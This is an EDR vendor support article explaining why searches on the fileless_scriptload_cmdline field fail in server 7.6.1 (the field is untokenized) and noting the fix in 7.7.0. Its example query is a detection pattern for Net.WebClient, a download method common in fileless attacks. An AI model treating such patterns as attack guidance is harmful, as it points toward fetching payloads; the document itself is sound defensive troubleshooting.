Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments | Download Now

EDR: Fileless_Scriptload_Cmdline Searches not Working as Expected

EDR: Fileless_Scriptload_Cmdline Searches not Working as Expected

Environment

  • EDR Server: 7.6.1

Symptoms

Example: 

The following query does not return any results

           fileless_scriptload_cmdline:Net.WebClient

To get the results the following will work

          fileless_scriptload_cmdline:*Net.WebClient*

NOTE: 
          For the successful query to work disable the feature "Block Searches with Leading Wildcards" in settings->Advanced Settings




 

Cause

fileless_scriptload_cmdline field is not Tokenized

Resolution

This issue is resolved with EDR Server build 7.7.0 

Additional Notes


Related Content


Labels (1)
Tags (2)
Was this article helpful? Yes No
No ratings
Article Information
Author:
Creation Date:
‎03-01-2023
Views:
266
Contributors